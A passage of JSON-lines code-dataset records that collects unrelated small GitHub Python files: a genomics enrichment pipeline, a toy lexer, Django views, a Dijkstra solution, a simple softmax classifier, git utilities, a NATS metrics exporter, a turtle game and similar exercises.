qtl_gwas_parsing \nimport rand_null_samp_permute_matching_confounders\nimport compute_fold_enrichments\nimport output_table\nimport GeneEnrich_inputs\n\nif __name__ == \"__main__\":\n\n args = os_sys_qtlenrich.parse_args()\n\n #check specific arguments\n os_sys_qtlenrich.raise_error_gencode_file(args)\n\n #retrieve dates\n date,month_date = os_sys_qtlenrich.retrieve_current_date()\n\n #parse exp label\n exp_label = os_sys_qtlenrich.parse_exp_label(args.exp_label)\n\n #Extract gwas Trait name\n gwas_trait = qtl_gwas_parsing.extract_gwas_trait_name(args.gwas_file,args.trait_name)\n\n #Create output directory\n output_directory = os_sys_qtlenrich.create_output_directory(args,month_date,exp_label)\n\n #create pvalues directory\n output_files_directory = os_sys_qtlenrich.create_output_files_directory(output_directory)\n\n #extract arguments\n arguments,parameters = os_sys_qtlenrich.extract_qtlenrich_arguments(args)\n\n #create and write to log file\n log_file = os_sys_qtlenrich.write_initial_logfile(output_directory,date,gwas_trait,args.qtl_type,arguments,parameters,exp_label)\n\n #Select appropriate files\n qtl_files = qtl_gwas_parsing.extract_qtl_files(args.qtl_directory,args.file_name)\n\n if args.subset_tissues:\n qtl_files = os_sys_qtlenrich.subset_qtl_files(qtl_files,args.file_name,args.tissue_names)\n\n #interaction qtl dict\n interaction_qtl_dict = qtl_gwas_parsing.interaction_qtl_dictionary(args.qtl_type,args.file_name,qtl_files)\n\n #parse gwas\n print(\"preparing gwas\")\n with open(log_file,\"a+\") as f:\n f.write(\"Preparing gwas\\n\")\n gwas = qtl_gwas_parsing.prepare_gwas_file(args.gwas_file,args.genome_build)\n\n print(\"Preparing confounders and null table...\\nThis may take a few minutes\\n\")\n with open(log_file,\"a+\") as f:\n f.write(\"Preparing confounders and null table...\\nThis may take a few minutes\\n\")\n\n #parse confounders and null tables\n confounders_table = 
qtl_gwas_parsing.read_confounders_table(args.confounders_table)\n    null_table = qtl_gwas_parsing.prepare_null_table(args.null_table,gwas)\n\n    print("parsing qtls\n")\n    with open(log_file,"a+") as f:\n        f.write("parsing qtls\n")\n\n    gencode = qtl_gwas_parsing.declare_gencode(args)\n\n    significant_qtl_dict,significant_qtl_gwas_dict,geneenrich_input_gwas_dict = qtl_gwas_parsing.parse_qtls(output_files_directory,month_date,gwas_trait,qtl_files,args.qtl_directory,args.qtl_type,args.file_name,gwas,args.qtl_q_value,args.independent_ranking,args.compute_tss_distance,gencode,args.subset_genes,args.null_option,args.keep_gene_id_suffix)\n\n    #Generate GeneEnrich Inputs if necessary\n    if args.GeneEnrich_input:\n        if args.qtl_type == "dapg_independent" or args.qtl_type == "conditional_independent":\n\n            #GeneEnrich input files for independent eQTLs require additional files\n            os_sys_qtlenrich.check_independent_GeneEnrich_parameters(args)\n\n            GeneEnrich_inputs.create_GeneEnrich_inputs_independent_qtls(args.eGenes_directory,args.eGene_file_name,gwas,gwas_trait,output_directory,date,geneenrich_input_gwas_dict,args.qtl_type,p=args.gwas_p_value,q=args.qtl_q_value,independent_ranking=args.independent_ranking,gencode=gencode,subset_genes=args.subset_genes)\n        else:\n            GeneEnrich_inputs.create_GeneEnrich_inputs_best_eqtl_sqtl(gwas_trait,output_directory,date,geneenrich_input_gwas_dict,args.qtl_type,exp_label,p=args.gwas_p_value,q=args.qtl_q_value)\n\n    del geneenrich_input_gwas_dict, gwas\n\n    print("computing observed fold-enrichment")\n    with open(log_file,"a+") as f:\n        f.write("computing observed fold-enrichment\n")\n\n    #Compute qtl Statistics\n    trait_dict,original_length_dict,observed_fold,obs_dict,best_eqtl_variants_dict = compute_fold_enrichments.compute_qtl_statistics(gwas_trait,significant_qtl_dict,significant_qtl_gwas_dict,args.gwas_p_value)\n\n    #perform random sampling of matched null variants\n    enrichment_p_value_dict,adjusted_fold_enrichment_dict,upper_bound_confidence_interval_dict,lower_bound_confidence_interval_dict,pi_1_dict,true_trait_dict = rand_null_samp_permute_matching_confounders.sample_match_null_confounders(log_file,month_date,output_files_directory,args.qtl_type,gwas_trait,confounders_table,null_table,significant_qtl_gwas_dict,observed_fold,args.gwas_p_value,null_option=args.null_option,num_permutations=args.lower_bound_permutations,upper_bound_permutations=args.upper_bound_permutations,lambda_factor=args.lambda_factor,independent_ranking=args.independent_ranking,compute_tss_distance=args.compute_tss_distance,keep_null_variants=args.keep_null_variants,keep_pvalue_matrix=args.keep_pvalue_matrix,interaction_qtl_dict=interaction_qtl_dict,num_quantiles=args.num_quantiles)\n\n    #create output table; use a distinct name so the imported output_table module is not shadowed\n    results_table = output_table.create_output_table(trait_dict,original_length_dict,best_eqtl_variants_dict,observed_fold,obs_dict,enrichment_p_value_dict, adjusted_fold_enrichment_dict,upper_bound_confidence_interval_dict,lower_bound_confidence_interval_dict,pi_1_dict,true_trait_dict)\n\n    #write output tables\n    results_directory = os_sys_qtlenrich.create_results_directory(output_directory)\n    output_filename = os_sys_qtlenrich.create_output_filename(results_directory,month_date,gwas_trait,args.qtl_type,args.independent_ranking,exp_label)\n\n    with open(log_file,"a+") as f:\n        f.write("Creating QTLEnrich output table. QTLEnrich is complete.\n")\n\n    results_table.to_csv(output_filename,index=None,sep="\t")\n\n","repo_name":"segrelabgenomics/QTLEnrich","sub_path":"src/QTLEnrichV2.py","file_name":"QTLEnrichV2.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"}
+{"seq_id":"40446504588","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\" TOKENS \n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# Token types\nTT_INT = \"INT\"\nTT_FLOAT = \"FLOAT\"\nTT_EQ = \"EQUAL\"\nTT_IDENTIFIER = \"IDENTIFIER\"\nTT_ASIGN = \"ASSIGNMENT\"\n\nDIGIT = '0123456789'\nLETTERS = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\nclass Token:\n    def __init__(self, tpe, value=None):\n        self._type = tpe\n        self._value = value\n\n    def __repr__(self):\n        if self._value: return f'{self._type}:{self._value}'\n        return f'{self._type}' \n\n    # Returns the token's value\n    def Value(self):\n        if self._value != None:\n            return self._value\n    # Returns the token's type\n    def Type(self):\n        return self._type\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\" ERRORS\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nclass Error:\n    def __init__(self, pos_start, pos_end, error_name, details):\n        self._pos_start = pos_start\n        self._pos_end = pos_end\n        self._error_name = error_name\n        self._details = details\n    \n    def as_string(self):\n        result = f'{self._error_name}: {self._details}\\n'\n        pos = self._pos_start._ln+1\n        result += f'File {self._pos_start._fn}, line {pos}'\n        return result\n\nclass IllegalCharError(Error):\n    def __init__(self, pos_start, pos_end, details):\n        super().__init__(pos_start, pos_end, 'Illegal Character', details)\n\n# Error in the variable declaration\nclass IllegalVariableError(Error):\n    def __init__(self, pos_start, pos_end, details):\n        super().__init__(pos_start, pos_end, 'Invalid variable declaration ', details)\n\nclass Position:\n    def __init__(self, idx, ln, col, fn, fntxt):\n        self._idx = idx\n        self._ln = ln\n        self._col = col\n        self._fn = fn\n        self._fntxt = fntxt\n\n    def advance(self, current_char):\n        self._idx += 1\n        self._col += 1\n        if current_char == '\\n':\n            self._ln += 1\n            # reset the column at the start of each new line\n            self._col = 0\n        return self\n    \n    def copy(self):\n        return Position(self._idx, self._ln, self._col, self._fn, self._fntxt)\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\" Mini lexical analyzer\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nclass Lexer:\n    def __init__(self, fn, text):\n        self._fn = fn\n        self._text = text\n        self._pos = Position(-1, 0, -1, fn, text) \n        self._current_char = None\n        self.advance()\n    \n    def advance(self):\n        self._pos.advance(self._current_char)\n        self._current_char = self._text[self._pos._idx] if self._pos._idx < len(self._text) else None\n    \n    def make_number(self):\n        num_str = ''\n        dot_count = 0\n\n        while self._current_char != None and self._current_char in DIGIT + '.':\n            if self._current_char == '.':\n                if dot_count == 1: break\n                dot_count += 1\n                num_str += '.'\n            else:\n                num_str += self._current_char\n            self.advance()\n        if dot_count == 0:\n            return Token(TT_INT, int(num_str))\n        else:\n            return Token(TT_FLOAT, float(num_str))\n\n    def make_identifier(self):\n        id_str = ''\n        pos = self._pos.copy()\n        while self._current_char != None and self._current_char in LETTERS:\n            id_str += self._current_char\n            self.advance()\n        return Token(TT_IDENTIFIER, id_str)\n\n    def analyze(self):\n        tokens = []\n        count = self._text.count('=')\n\n        if count > 1:\n            pos = self._pos.copy()\n            char = self._current_char\n            self.advance()\n            return [], IllegalVariableError(pos, self._pos, '-> ' + self._text)\n        elif count == 1:\n            name = self._text.split('=')[0]\n            tokens.append(Token(TT_IDENTIFIER, name))\n            for n in range(len(name)):\n                self.advance()\n            # make_tokens appends into `tokens` in place, so just propagate its result\n            tokens, error = self.make_tokens(tokens)\n            return tokens, error\n        else:\n            tokens, error = self.make_tokens(tokens)\n            return tokens, error\n\n    def make_tokens(self, tokens):\n        # tokens = []\n\n        while self._current_char != None:\n            if self._current_char in '\\t' or self._current_char == ' ':\n                self.advance()\n            elif self._current_char in DIGIT:\n                tokens.append(self.make_number())\n            elif self._current_char == '=':\n                tokens.append(Token(TT_ASIGN))\n                self.advance()\n            else:\n                pos = self._pos.copy()\n                char = self._current_char\n                self.advance()\n                return [], IllegalCharError(pos, self._pos, \"'\" + char + \"'\")\n        return tokens, None\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\ndef make_identifier(text):\n    if ' '.join(map(str, text)).count('=') == 1:\n        num = float(' '.join(map(str, text)).split('=')[-1])\n    else:\n        num = float(text)\n    return num\n\ndef run(fn, text):\n    lexer = Lexer(fn, text)\n    tokens, error = lexer.analyze()\n    return tokens, error","repo_name":"YisusCristo/STraductoresII","sub_path":"Modulo 1 -Mini Léxcio/lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
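The mini-lexer above is driven through run(fn, text); a short usage sketch, assuming the record is saved as lexico.py as its metadata indicates:

from lexico import run

tokens, error = run('<stdin>', 'total = 3.14')
if error:
    print(error.as_string())
else:
    print(tokens)  # [IDENTIFIER:total , ASSIGNMENT, FLOAT:3.14]

Note the identifier keeps the space before '=' because analyze() splits the raw text without stripping it.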
self.advance()\n return Token(TT_IDENTIFIER, id_str)\n\n def analyze(self):\n tokens = []\n count = self._text.count('=')\n\n if count > 1:\n pos = self._pos.copy()\n char = self._current_char\n self.advance()\n return [], IllegalVariableError(pos, self._pos, '-> ', self._text)\n elif count == 1:\n name = self._text.split('=')[0]\n tokens.append(Token(TT_IDENTIFIER, name))\n for n in range(len(name)):\n self.advance()\n tokens.append(self.make_tokens(tokens)[0])\n return tokens, None\n else:\n tokens = self.make_tokens(tokens)[0]\n return tokens, None\n\n def make_tokens(self, tokens):\n # tokens = []\n\n while self._current_char != None:\n if self._current_char in '\\t' or self._current_char == ' ':\n self.advance()\n elif self._current_char in DIGIT:\n tokens.append(self.make_number())\n elif self._current_char == '=':\n tokens.append(Token(TT_ASIGN))\n self.advance()\n else:\n pos = self._pos.copy()\n char = self._current_char\n self.advance()\n return [], IllegalCharError(pos, self._pos, \"'\" + char + \"'\")\n return tokens, None\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\ndef make_identifier(text):\n if ' '.join(map(str, text)).count('=') == 1:\n num = float(' '.join(map(str, text)).split('=')[-1])\n else:\n num = float(text)\n return num\n\ndef run(fn, text):\n lexer = Lexer(fn, text)\n tokens, error = lexer.analyze()\n return tokens, error","repo_name":"YisusCristo/STraductoresII","sub_path":"Modulo 1 -Mini Léxcio/lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29333423321","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom .models import Post\nfrom django.http import HttpResponse\n\n# Create your views here.\n\nclass EntryList(ListView):\n\ttemplate_name = 'base.html'\n\tmodel = Post\n\n\n\tdef get(self, request):\n\t\tprint('Hawkguy!')\n\t\tposts = Post.objects.all()\n\t\tprint(posts)\n\t\treturn HttpResponse(posts)\n\t\t\n\nclass EntryDetail(DetailView):\n\ttemplate_name = 'detail.html'\n\t\n\tqueryset = Post.objects.all()\n","repo_name":"Rayxclockwork/django-models","sub_path":"comics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40953316883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 20 20:45:29 2019\n\n@author: yangyutu123\n\"\"\"\n\nimport math\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pylab as plt\n\nimport numpy as np\nscale = 2\nvec1 = np.array([2.0, 0.0])*2\nvec2 = np.array([2.0 * math.cos(np.pi / 3.0), 2.0 * math.sin(np.pi / 3.0)])*2\n\nq = deque()\nq.append(np.array([0.0, 0.0]))\n\nN = 1000\nconfig = []\n\n# put in first line\nfor i in range(50):\n p = q[-1]\n p1 = p + vec1 + (np.random.random(2) - np.array([0.5, 0.5]))\n q.append(p1)\n\nfor p in q:\n config.append(p)\n\nfor i in range(N):\n p = q[0]\n q.popleft()\n p2 = p + vec2 + (np.random.random(2) - np.array([0.5, 0.5]))\n q.append(p2)\n config.append(p2)\n\nconfig = np.array(config)\n\nplt.close('all')\nplt.figure(1)\n\nplt.scatter(config[:, 0], config[:, 1])\n\nconfig[:, 0] = config[:, 0] - np.mean(config[:, 0])\nconfig[:, 1] = config[:, 1] - np.mean(config[:, 1])\n\ndist = np.sqrt(config[:, 0] ** 2 + config[:, 1] ** 2)\n\ndistSortIdx = np.argsort(dist)\n\nN = 300\n\nconfigOut = config[distSortIdx[0:N], 
:]\n\nplt.figure(2)\nplt.scatter(configOut[:, 0], configOut[:, 1])\n\noutput = np.array([list(np.arange(N)), list(configOut[:,0]), list(configOut[:,1]), list(np.zeros(N))]).T\n\nnp.savetxt('RandomConfigN300_0.txt', output)","repo_name":"yangyutu/DeepReinforcementAssembly","sub_path":"BDModel/generateRandomConfig.py","file_name":"generateRandomConfig.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"33584225975","text":"# https://www.acmicpc.net/problem/15956\n\n\n\"\"\"\nA problem that uses Dijkstra's algorithm.\nWe need the shortest distance from one vertex to several vertices,\nand since no edge has a negative weight, Dijkstra's algorithm applies.\nRun Dijkstra's algorithm from each of the mandatory vertices P and Q\nand take the minimum among the sums of the shortest distances.\n\"\"\"\n\n\nimport sys, heapq\ninput = sys.stdin.readline\n\nN, E = map(int, input().split())\ngraph = [[] for _ in range(N)]\n\n# assume the start is vertex 0 and the destination is vertex N-1\nfor _ in range(E):\n    a, b, c = map(int, input().split())\n    graph[a-1].append([b-1, c])\n    graph[b-1].append([a-1, c])\n\nP, Q = map(lambda x: int(x)-1, input().split())\n\n\ndef dijkstra(start):\n    dists = [float('inf')] * N\n    heap = []\n    dists[start] = 0\n    heap.append([0, start])\n\n    while heap:\n        dist, vertex = heapq.heappop(heap)\n        if dist > dists[vertex]:\n            continue\n\n        for next_vertex, next_cost in graph[vertex]:\n            if dists[next_vertex] > dist + next_cost:\n                dists[next_vertex] = dist + next_cost\n                heapq.heappush(heap, [dists[next_vertex], next_vertex])\n\n    return dists\n\n\ndist_from_0 = dijkstra(0) # distances from 0\ndist_from_P = dijkstra(P) # distances from P\ndist_from_Q = dijkstra(Q) # distances from Q\n\na = dist_from_0[P] # 0 -> P\nb = dist_from_0[Q] # 0 -> Q\nc = dist_from_P[Q] # P -> Q ( == Q -> P)\nd = dist_from_P[-1] # P -> (N-1)\ne = dist_from_Q[-1] # Q -> (N-1)\n\nanswer = min(a+e, b+d) + c\nprint(answer) if answer != float('inf') else print(-1)\n\n","repo_name":"ChoiHeon/algorithm","sub_path":"02_백준/[1504] 특정한 최단 경로.py","file_name":"[1504] 특정한 최단 경로.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7312496900","text":"# Jason Hilliard and Jeff Wu\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nclass TwoLayerNN():\r\n    def __init__(self, input_dim, output_dim):\r\n        self.theta = np.random.randn(input_dim, int(output_dim)) / np.sqrt(input_dim)\r\n        self.bias = np.zeros((1, int(output_dim)))\r\n\r\n    # --------------------------------------------------------------------------\r\n\r\n    def compute_cost(self, X, y):\r\n\r\n        num_examples = np.shape(X)[0]\r\n        z = np.dot(X, self.theta) + self.bias\r\n        exp_z = np.exp(z)\r\n        softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n\r\n        one_hot_y = np.zeros((num_examples, int(np.max(y)) + 1))\r\n        logloss = np.zeros((num_examples,))\r\n        for i in range(np.shape(X)[0]):\r\n            one_hot_y[i, int(y[i])] = 1\r\n            logloss[i] = -np.sum(np.log(softmax_scores[i, :]) * one_hot_y[i, :])\r\n        data_loss = np.sum(logloss)\r\n        return 1. 
/ num_examples * data_loss\r\n\r\n # --------------------------------------------------------------------------\r\n\r\n def predict(self, X):\r\n\r\n z = np.dot(X, self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / (exp_z + 1)\r\n predictions = np.argmax(softmax_scores, axis=1)\r\n return predictions\r\n\r\n # --------------------------------------------------------------------------\r\n\r\n def train(self, X, y, num_epochs, lr=0.01):\r\n for epoch in range(0, num_epochs):\r\n\r\n # Forward propagation\r\n z = np.dot(X, self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n\r\n # Backpropagation\r\n beta = np.zeros_like(softmax_scores)\r\n one_hot_y = np.zeros_like(softmax_scores)\r\n for i in range(X.shape[0]):\r\n one_hot_y[i, int(y[i])] = 1\r\n beta = softmax_scores - one_hot_y\r\n\r\n # Compute gradients of model parameters\r\n dtheta = np.dot(X.T, beta)\r\n dbias = np.sum(beta, axis=0)\r\n\r\n # Gradient descent parameter update\r\n self.theta -= lr * dtheta\r\n self.bias -= lr * dbias\r\n","repo_name":"jrhill95/440-Project-1","sub_path":"NeuralNetModified/twolnn.py","file_name":"twolnn.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70929004595","text":"from django.contrib import admin\nfrom .models import EventMetherologic\n\n\nclass EventMetherologicAdmin(admin.ModelAdmin):\n list_filter = [\n 'position',\n 'where',\n 'status'\n ]\n list_display = [\n 'position_name',\n 'details',\n 'where',\n 'position',\n 'status',\n ]\n list_per_page = 50\n \nadmin.site.register(EventMetherologic, EventMetherologicAdmin)","repo_name":"greghonox/django","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"17638559556","text":"import os\nimport subprocess\nfrom collections.abc import Iterator\nfrom typing import Any\n\n\ndef list_directories(path: str) -> list[str]:\n \"\"\"\n List only directories in a path.\n \"\"\"\n return next(os.walk(path))[1]\n\n\ndef flatten(items: list[Any] | tuple[Any, ...]) -> Iterator[Any]:\n \"\"\"\n Flatten a nested list or tuple.\n\n Examples:\n list(flatten([\"a\", \"b\", [1, \"z\"]]))\n \"\"\"\n for item in items:\n if isinstance(item, (list, tuple)):\n yield from flatten(item)\n else:\n yield item\n\n\ndef sort_by_basename(arr: tuple[str, ...]) -> tuple[str, ...]:\n \"\"\"\n Sort a tuple containing paths by the basename.\n\n Examples:\n paths = (\"abc/z\", \"def/a\")\n sort_by_basename(paths)\n \"\"\"\n sorted_arr = tuple(\n sorted(arr, key=lambda a: os.path.splitext(os.path.basename(a))[0])\n )\n return sorted_arr\n\n\ndef fancy_text(text: str, color: str, styles: tuple[str, ...] 
| None = None) -> str:\n \"\"\"\n Prints string with ANSI colors on terminal.\n \"\"\"\n\n ansi_codes = {\n \"parameters\": {\n \"reset\": \"0\",\n \"bold\": \"1\",\n \"italic\": \"3\",\n \"underline\": \"4\",\n },\n \"colors\": {\n \"black\": \"30\",\n \"red\": \"31\",\n \"green\": \"32\",\n \"yellow\": \"33\",\n \"blue\": \"34\",\n \"magenta\": \"35\",\n \"cyan\": \"36\",\n \"white\": \"37\",\n \"gray\": \"90\",\n },\n }\n\n # wrap escape characters:\n for section in ansi_codes:\n ansi_codes[section] = dict(\n zip(\n ansi_codes[section].keys(),\n map(lambda x: f\"\\033[{x}m\", ansi_codes[section].values()),\n )\n )\n\n if styles is not None:\n text_styles = \"\".join([ansi_codes[\"parameters\"][style] for style in styles])\n else:\n text_styles = \"\"\n\n text = \"{styles}{color}{text}{reset}\".format(\n styles=text_styles,\n color=ansi_codes[\"colors\"][color],\n text=text,\n reset=ansi_codes[\"parameters\"][\"reset\"],\n )\n return text\n\n\ndef check_git_installed():\n \"\"\"\n Checks if git is installed on the system. Exits the program if it is not\n installed.\n \"\"\"\n import shutil\n\n cmd = shutil.which(\"git\")\n if cmd is None:\n raise SystemError(\"Error: git is not found\")\n\n\ndef run_git_command(path: str, what: list[str]) -> dict:\n \"\"\"\n Run a git command in a path.\n\n :param path str: path to run the git command.\n :param what List[str]: which command(s) to run.\n\n Details:\n -C comes from that as if git was started in instead\n of the current working directory.\n \"\"\"\n cmd = list(flatten([\"git\", \"-C\", os.path.expanduser(path), what]))\n proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)\n res = {\"status\": False, \"output\": \"\"}\n res[\"status\"] = True if proc.returncode == 0 else False\n res[\"output\"] = proc.stdout.decode(\"utf-8\")\n return res\n\n\ndef display_table(cols):\n # get highest character length from each column\n max_length = []\n for col in cols:\n highest = len(max(col, key=len))\n max_length.append(highest)\n\n rows = zip(*cols)\n\n for row in rows:\n print(\"\\u2022\", end=\" \")\n for i, _ in enumerate(row):\n value = row[i]\n max_len = max_length[i]\n fmt_value = value.ljust(max_len)\n print(fmt_value, end=\" \")\n print(\"\")\n","repo_name":"strboul/git-substatus","sub_path":"git_substatus/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"19598461206","text":"import asyncio\n\nimport nats.aio.client\nimport nats.js.api\nfrom litestar import Litestar, get\nfrom litestar.datastructures import ResponseHeader, State\n\nfrom nats_js_prom import config\n\n\n@get('/', response_headers=[ResponseHeader(name='Content-Type', value='text/plain; version=0.0.4')])\nasync def metrics_handler(state: State) -> str:\n nc: nats.aio.client.Client = state.nc\n cfg: config.Config = state.cfg\n js = nc.jetstream(domain=cfg.stream_domain)\n cons = await js.add_consumer(cfg.stream_name, nats.js.api.ConsumerConfig(inactive_threshold=10))\n sub = await js.pull_subscribe('', cons.name, cfg.stream_name)\n pending = cons.num_pending or 0\n ret = []\n for _ in range(pending):\n msgs = await sub.fetch(1)\n acks = []\n for msg in msgs:\n try:\n to_parse = msg.data.decode('utf-8')\n if to_parse in cfg.value_mapping:\n to_parse = cfg.value_mapping[to_parse]\n value = float(to_parse)\n label = msg.subject.replace('.', '_').replace('-', '_')\n if cfg.export_prefix:\n label = f'{cfg.export_prefix}_{label}'\n 
ret.append(f'{label} {value}')\n except ValueError:\n print(f'Failed to parse {msg.data} as float')\n finally:\n acks.append(msg.ack())\n await asyncio.gather(*acks)\n await js.delete_consumer(cfg.stream_name, cons.name)\n return '\\n'.join(ret)\n\nasync def setup_nats(app: Litestar) -> None:\n \"\"\"Setup NATS connection and add it to the app state\"\"\"\n print(\"I am making a new connection!\")\n cfg = app.state.cfg\n nc = await nats.connect(cfg.nats_url, user_credentials=cfg.nats_creds_path)\n app.state.nc = nc\n\nasync def close_nats(app: Litestar) -> None:\n \"\"\"Close NATS connection\"\"\"\n print(\"I am closing the connection!\")\n await app.state.nc.close()\n\ndef create_app(cfg: config.Config) -> Litestar:\n app = Litestar(route_handlers=[metrics_handler],\n debug=cfg.debug, on_startup=[setup_nats],\n on_shutdown=[close_nats],\n state=State({\"cfg\": cfg}))\n\n return app\n","repo_name":"m3nowak/nats-js-prom","sub_path":"src/nats_js_prom/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"25664064350","text":"from setuptools import setup\n\npackage_name = 'autonomy_hmi'\nui_name = 'window.ui'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/ament_index/resource_index/packages',\n ['resource/' + ui_name]),\n ('share/ament_index/resource_index/packages',\n ['resource/' + 'style.qss']),\n ('share/' + package_name, ['package.xml']),\n\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='igvcsp2022',\n maintainer_email='max.desantis@okstate.edu',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'gui_node = autonomy_hmi.gui_node:main',\n 'joy_pub_node = autonomy_hmi.joy_pub_node:main',\n 'joy_motion_mapper_node = autonomy_hmi.joy_motion_mapper_node:main'\n ],\n },\n)\n","repo_name":"osu-igvc/autonomy_hmi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37622529142","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.cars_list = []\n self.car_speed = STARTING_MOVE_DISTANCE\n\n def create_car(self):\n new_car = Turtle()\n new_car.shape(\"square\")\n new_car.shapesize(stretch_len=2)\n new_car.color(random.choice(COLORS))\n new_car.penup()\n new_car.goto(x=300, y=random.randint(-250, 250))\n self.cars_list.append(new_car)\n\n def move_cars(self):\n for car in self.cars_list:\n car.goto(x=car.xcor() - self.car_speed, y=car.ycor())\n\n def level_up(self):\n self.car_speed += MOVE_INCREMENT","repo_name":"arnoldas/python-bootcamp-2023","sub_path":"Day-23-Turtle-Crossing-Game/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41933466648","text":"import matplotlib.pyplot as plt\nfrom sksurv.datasets import load_breast_cancer\nfrom sksurv.preprocessing import OneHotEncoder\nfrom sksurv.linear_model import CoxnetSurvivalAnalysis\n\nX, y = 
load_breast_cancer()\nX = OneHotEncoder().fit_transform(X)\n\nestimator = CoxnetSurvivalAnalysis(l1_ratio=0.99, fit_baseline_model=True)\nestimator.fit(X, y)\n\nchf_funcs = {}\nfor alpha in estimator.alphas_[:5]:\n chf_funcs[alpha] = estimator.predict_cumulative_hazard_function(\n X.iloc[:1], alpha=alpha)\n\n\nfor alpha, chf_alpha in chf_funcs.items():\n for fn in chf_alpha:\n plt.step(fn.x, fn(fn.x), where=\"post\",\n label=f\"alpha = {alpha:.3f}\")\n\nplt.ylim(0, 1)\nplt.legend()\nplt.show()","repo_name":"aleksejalex/ske_assignment","sub_path":"testing_Cox_from_sklearn.py","file_name":"testing_Cox_from_sklearn.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31805092167","text":"# Uses python3\n__author__ = 'kwheelerj'\nimport sys\n\ndef get_majority_element(a, left, right):\n\tif left == right:\n\t\treturn -1\n\tif left + 1 == right:\n\t\treturn a[left]\n\n\t# countArray = [0] * n\n\tcountDict = {}\n\tfor i in range(left, right):\n\t\tif str(a[i]) not in countDict.keys():\n\t\t\tcountDict[str(a[i])] = 0\n\t\tcountDict[str(a[i])] += 1\n\t# print(countDict)\n\t_max = 0\n\tkey = ''\n\tfor _key in countDict.keys():\n\t\tif countDict[_key] > _max:\n\t\t\t_max = countDict[_key]\n\t\t\tkey = _key\n\t# print('majority must be greater than ' + str(right // 2))\n\t# print('max is ' + str(_max))\n\tif _max > right // 2:\n\t\treturn countDict[key]\n\treturn -1\n\nif __name__ == '__main__':\n\tinput = sys.stdin.read()\n\tn, *a = list(map(int, input.split()))\n\t# inp = input()\n\t# n, *a = list(map(int, inp.split()))\n\tif get_majority_element(a, 0, n) != 